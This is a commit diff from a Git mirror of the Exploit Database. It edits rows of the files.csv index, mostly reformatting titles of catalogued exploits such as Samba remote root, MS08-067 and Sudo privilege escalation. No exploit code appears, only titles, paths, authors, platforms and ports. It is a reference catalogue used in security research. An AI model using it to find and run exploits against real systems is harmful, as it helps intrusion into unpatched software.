bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_15_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-15 04:37:40 +00:00
parent 5eff4e51ec
commit 9b54da834d
18 changed files with 1034 additions and 639 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

62
files.csv
View file

@ -5,10 +5,10 @@ id,file,description,date,author,platform,type,port
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0
5,platforms/windows/remote/5.c,"MS Windows RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
6,platforms/php/webapps/6.php,"WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0
7,platforms/linux/remote/7.pl,"Samba 2.2.x Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139
8,platforms/linux/remote/8.c,"SETI@home Clients Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0
9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit - sambal.c",2003-04-10,eSDee,linux,remote,139
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
11,platforms/linux/dos/11.c,"Apache <= 2.0.44 Linux Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0
13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0
@ -1258,7 +1258,7 @@ id,file,description,date,author,platform,type,port
1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0
1516,platforms/php/webapps/1516.php,"ilchClan <= 1.05g (tid) Remote SQL Injection Exploit",2006-02-20,x128,php,webapps,0
1517,platforms/php/webapps/1517.c,"PunBB <= 2.0.10 (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,webapps,0
1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0
1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 - User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0
1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser (Safe File) Remote Code Execution Exploit",2006-02-22,"H D Moore",osx,remote,0
1520,platforms/windows/remote/1520.pl,"MS Windows Media Player Plugin Overflow Exploit (MS06-006)(3)",2006-02-22,"Matthew Murphy",windows,remote,0
1521,platforms/php/webapps/1521.php,"Noahs Classifieds <= 1.3 (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0
@ -1501,7 +1501,7 @@ id,file,description,date,author,platform,type,port
1788,platforms/windows/remote/1788.pm,"PuTTy.exe <= 0.53 - (validation) Remote Buffer Overflow Exploit (meta)",2006-05-15,y0,windows,remote,0
1789,platforms/php/webapps/1789.txt,"TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability",2006-05-15,Kacper,php,webapps,0
1790,platforms/php/webapps/1790.txt,"Squirrelcart <= 2.2.0 (cart_content.php) Remote Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication - Auth Bypass Patch (EXE)",2006-05-16,redsand,multiple,remote,5900
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication - Auth Bypass (Patch EXE)",2006-05-16,redsand,multiple,remote,5900
1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0
1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
@ -1613,7 +1613,7 @@ id,file,description,date,author,platform,type,port
1903,platforms/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",php,webapps,0
1904,platforms/php/webapps/1904.php,"blur6ex <= 0.3.462 (ID) Admin Disclosure / Blind SQL Injection Exploit",2006-06-12,rgod,php,webapps,0
1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x (root) Remote File Include Vulnerability",2006-06-12,"Federico Fazzi",php,webapps,0
1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit",2006-06-12,h07,windows,remote,0
1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit",2006-06-12,h07,windows,remote,0
1907,platforms/php/webapps/1907.txt,"aWebNews <= 1.5 (visview.php) Remote File Include Vulnerability",2006-06-13,SpC-x,php,webapps,0
1908,platforms/php/webapps/1908.txt,"Minerva <= 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability",2006-06-13,Kacper,php,webapps,0
1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution Exploit",2006-06-13,"Javier Olascoaga",php,webapps,0
@ -1622,7 +1622,7 @@ id,file,description,date,author,platform,type,port
1912,platforms/php/webapps/1912.txt,"The Bible Portal Project <= 2.12 (destination) File Include Vulnerability",2006-06-14,Kacper,php,webapps,0
1913,platforms/php/webapps/1913.txt,"Php Blue Dragon CMS <= 2.9.1 (template.php) File Include Vulnerability",2006-06-14,"Federico Fazzi",php,webapps,0
1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) <= 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0
1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit (meta)",2006-06-15,c0rrupt,windows,remote,0
1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit (meta)",2006-06-15,c0rrupt,windows,remote,0
1916,platforms/php/webapps/1916.txt,"DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities",2006-06-15,"Andreas Sandblad",php,webapps,0
1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 (Long Filename) Buffer Overflow Exploit",2006-06-15,c0rrupt,windows,local,0
1918,platforms/php/webapps/1918.php,"bitweaver <= 1.3 (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0
@ -1722,7 +1722,7 @@ id,file,description,date,author,platform,type,port
2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)",2006-07-15,UmZ,multiple,remote,10000
2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (perl)",2006-07-15,UmZ,multiple,remote,10000
2018,platforms/php/webapps/2018.txt,"FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability",2006-07-16,igi,php,webapps,0
2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod <= 1.2 (m2f_root_path) Remote Include Vulns",2006-07-17,OLiBekaS,php,webapps,0
2020,platforms/php/webapps/2020.txt,"com_videodb Mambo Component <= 0.3en Remote Include Vulnerability",2006-07-17,h4ntu,php,webapps,0
@ -2159,7 +2159,7 @@ id,file,description,date,author,platform,type,port
2464,platforms/osx/local/2464.pl,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Exploit (10.3.x 0day)",2006-09-30,"Kevin Finisterre",osx,local,0
2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 (BSX_LIBDIR) Remote File Include Exploit",2006-10-01,Kacper,php,webapps,0
2466,platforms/linux/local/2466.pl,"cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit",2006-10-01,"Clint Torrez",linux,local,0
2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 (Source) Remote Exploit",2006-10-01,muts,windows,remote,81
2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit",2006-10-01,muts,windows,remote,81
2468,platforms/php/webapps/2468.txt,"BBaCE <= 3.5 (includes/functions.php) Remote File Include Vulnerability",2006-10-02,SpiderZ,php,webapps,0
2469,platforms/php/webapps/2469.pl,"JAF CMS <= 4.0 RC1 (forum.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0
2470,platforms/php/webapps/2470.txt,"phpMyProfiler <= 0.9.6 - Remote File Include Vulnerability",2006-10-03,mozi,php,webapps,0
@ -2701,7 +2701,7 @@ id,file,description,date,author,platform,type,port
3026,platforms/php/webapps/3026.txt,"Bubla <= 1.0.0rc2 (bu/process.php) Remote File Include Vulnerability",2006-12-27,DeltahackingTEAM,php,webapps,0
3027,platforms/php/webapps/3027.txt,"Fantastic News <= 2.1.4 - Multiple Remote File Include Vulnerabilities",2006-12-27,Mr-m07,php,webapps,0
3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Include Vulnerability",2006-12-27,"Mehmet Ince",php,webapps,0
3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0
3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i - cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0
3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 ierpplug.dll Internet Explorer Denial of Service Exploit",2006-12-28,shinnai,windows,dos,0
3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0
3032,platforms/asp/webapps/3032.txt,"wywo - inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0
@ -2941,7 +2941,7 @@ id,file,description,date,author,platform,type,port
3271,platforms/php/webapps/3271.php,"GGCMS <= 1.1.0 RC1 Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0
3272,platforms/windows/dos/3272.html,"MS Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0
3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0
3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win)",2007-02-06,"Marco Ivaldi",windows,remote,3306
3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 - User-Defined Function Command Execution Exploit (win)",2007-02-06,"Marco Ivaldi",windows,remote,3306
3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 (inhalt.php) Remote File Include Vulnerability",2007-02-06,ajann,php,webapps,0
3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0
3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 Remote Heap Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0
@ -5342,7 +5342,7 @@ id,file,description,date,author,platform,type,port
5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability",2008-06-01,KnocKout,asp,webapps,0
5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0
5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0
5720,platforms/linux/remote/5720.py,"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
5720,platforms/linux/remote/5720.py,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x Blind SQL Injection Exploit",2008-06-02,His0k4,php,webapps,0
5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-06-02,HaiHui,php,webapps,0
5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - Remote SQL injection Vulnerability",2008-06-02,His0k4,php,webapps,0
@ -6686,7 +6686,7 @@ id,file,description,date,author,platform,type,port
7129,platforms/multiple/local/7129.sh,"Sudo <= 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit",2008-11-15,kingcope,multiple,local,0
7130,platforms/php/webapps/7130.php,"Minigal b13 (index.php list) Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0
7131,platforms/php/webapps/7131.txt,"yahoo answers (id) Remote SQL Injection Vulnerability",2008-11-16,snakespc,php,webapps,0
7132,platforms/windows/remote/7132.py,"MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)",2008-11-16,"Debasis Mohanty",windows,remote,445
7132,platforms/windows/remote/7132.py,"MS Windows Server Service - Code Execution Exploit (MS08-067) (2k/2k3)",2008-11-16,"Debasis Mohanty",windows,remote,445
7133,platforms/php/webapps/7133.txt,"FloSites Blog Multiple Remote SQL Injection Vulnerabilities",2008-11-16,Vrs-hCk,php,webapps,0
7134,platforms/php/webapps/7134.txt,"phpstore Wholesale (track.php?id) SQL Injection Vulnerability",2008-11-16,"Hussin X",php,webapps,0
7135,platforms/windows/local/7135.htm,"Opera 9.62 file:// Local Heap Overflow Exploit",2008-11-17,"Guido Landi",windows,local,0
@ -8098,7 +8098,7 @@ id,file,description,date,author,platform,type,port
8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - (.M3U File) Local Stack Overflow Exploit (3)",2009-05-01,Stack,windows,local,0
8593,platforms/php/webapps/8593.txt,"pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability",2009-05-01,SirGod,php,webapps,0
8594,platforms/windows/local/8594.pl,"RM Downloader (.smi File) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0
8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 9.0 getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0
8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
@ -8684,7 +8684,7 @@ id,file,description,date,author,platform,type,port
9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 (LANG) Remote File Inclusion Vulnerabilities",2009-07-20,NoGe,php,webapps,0
9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 (sql/xss/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0
9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0
9207,platforms/windows/local/9207.sh,"PulseAudio setuid Local Privilege Escalation Exploit",2009-07-20,N/A,windows,local,0
9207,platforms/windows/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,N/A,windows,local,0
9208,platforms/linux/local/9208.txt,"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)",2009-07-20,N/A,linux,local,0
9209,platforms/hardware/remote/9209.txt,"DD-WRT (httpd service) Remote Command Execution Vulnerability",2009-07-20,gat3way,hardware,remote,0
9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0
@ -9343,7 +9343,7 @@ id,file,description,date,author,platform,type,port
9966,platforms/windows/remote/9966.txt,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-02,"Nikolas Rangos",windows,remote,80
9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0
9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0
9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive Service privilege escalation",2009-10-20,"bellick ",windows,local,0
9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0
9971,platforms/windows/local/9971.php,"Spider Solitaire PoC",2009-10-15,SirGod,windows,local,0
9973,platforms/multiple/local/9973.sh,"Sun VirtualBox <= 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0
9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0
@ -10642,7 +10642,7 @@ id,file,description,date,author,platform,type,port
11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0
11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php - (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4",2010-03-07,kingcope,multiple,local,0
11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0
11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus ""V4.rgo"" (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0
11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
@ -10650,7 +10650,7 @@ id,file,description,date,author,platform,type,port
11657,platforms/php/webapps/11657.txt,"Chaton <= 1.5.2 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver <= 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0
11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0
11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - SQL injection Vulnerability (id)",2010-03-09,kaMtiEz,php,webapps,0
@ -13262,7 +13262,7 @@ id,file,description,date,author,platform,type,port
15300,platforms/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 - Blind SQL Injection Vulnerability",2010-10-21,"Salvatore Fresta",php,webapps,0
15301,platforms/windows/dos/15301.pl,"Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability",2010-10-21,LiquidWorm,windows,dos,0
15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service Vulnerability",2010-10-22,"MOHAMED ABDI",windows,dos,0
15304,platforms/linux/local/15304.txt,"GNU C library dynamic linker LD_AUDIT arbitrary DSO load Vulnerability",2010-10-22,"Tavis Ormandy",linux,local,0
15304,platforms/linux/local/15304.txt,"GNU C library dynamic linker LD_AUDIT - Arbitrary DSO Load Vulnerability (Local Root)",2010-10-22,"Tavis Ormandy",linux,local,0
15305,platforms/windows/dos/15305.pl,"RarmaRadio <= 2.53.1 (.m3u) Denial of Service vulnerability",2010-10-23,anT!-Tr0J4n,windows,dos,0
15306,platforms/win32/dos/15306.pl,"AnyDVD <= 6.7.1.0 - Denial of Service",2010-10-23,Havok,win32,dos,0
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS",2010-10-23,d0lc3,windows,dos,0
@ -13386,7 +13386,7 @@ id,file,description,date,author,platform,type,port
15445,platforms/windows/remote/15445.txt,"femitter ftp server 1.04 - Directory Traversal vulnerability",2010-11-06,chr1x,windows,remote,0
15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0
15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
@ -13493,7 +13493,7 @@ id,file,description,date,author,platform,type,port
15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Local Privilege Escalation Vulnerability",2010-11-20,LiquidWorm,windows,local,0
15585,platforms/php/webapps/15585.txt,"Joomla Component (com_jimtawl) Local File Inclusion Vulnerability",2010-11-20,Mask_magicianz,php,webapps,0
15588,platforms/php/webapps/15588.txt,"s-cms 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0
15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler Privilege Escalation 0day",2010-11-20,webDEViL,windows,local,0
15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler - Privilege Escalation (0day)",2010-11-20,webDEViL,windows,local,0
15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0
15592,platforms/php/webapps/15592.txt,"sahitya graphics cms Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross Site Request Forgery exploit",2010-11-21,"Mon7rF .",php,webapps,0
@ -15668,7 +15668,7 @@ id,file,description,date,author,platform,type,port
18080,platforms/linux/local/18080.c,"Linux <= 2.6.37-rc1 serial_multiport_struct Local Info Leak Exploit",2011-11-04,"Todor Donev",linux,local,0
18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0
18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit",2011-11-04,metasploit,windows,local,0
18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
18086,platforms/linux/local/18086.c,"Calibre E-Book Reader Local Root",2011-11-05,zx2c4,linux,local,0
@ -16205,7 +16205,7 @@ id,file,description,date,author,platform,type,port
18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0
18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Y?lmaz",php,webapps,0
18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 Buffer Overflow",2012-04-23,shinnai,windows,dos,0
18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0
18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 - (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0
18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos,0
18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter Integer Overflow Vulnerability",2012-04-24,"Akita Software Security",windows,dos,0
18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 (index.php p parameter) SQL Injection",2012-04-24,G13,php,webapps,0
@ -18971,7 +18971,7 @@ id,file,description,date,author,platform,type,port
21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai Multiple Cross Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0
21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 Path Disclosure Vulnerability",2002-08-20,"Stan Bubrouski",cgi,webapps,0
21731,platforms/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 HTTP Post Arbitrary Perl Code Execution Vulnerability",2002-08-20,"Dan Elder",novell,remote,0
21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 SSH Environment Shell Escaping Vulnerability",2002-08-20,"Derek D. Martin",linux,local,0
21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 - SSH Environment Shell Escaping Vulnerability",2002-08-20,"Derek D. Martin",linux,local,0
21733,platforms/linux/local/21733.sh,"Sun Cobalt RaQ 4.0 Predictable Temporary Filename Symbolic Link Attack Vulnerability",2002-06-28,"Charles Stevenson",linux,local,0
21734,platforms/unix/remote/21734.txt,"Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability",2002-08-21,Skinnay,unix,remote,0
21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 Encoded Backslash Directory Traversal Vulnerability",2002-08-22,"Auriemma Luigi",windows,remote,0
@ -22999,7 +22999,7 @@ id,file,description,date,author,platform,type,port
25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0
25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0
25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0
25912,platforms/windows/local/25912.c,"Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring 0 Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0
25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0
25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0
@ -30503,7 +30503,7 @@ id,file,description,date,author,platform,type,port
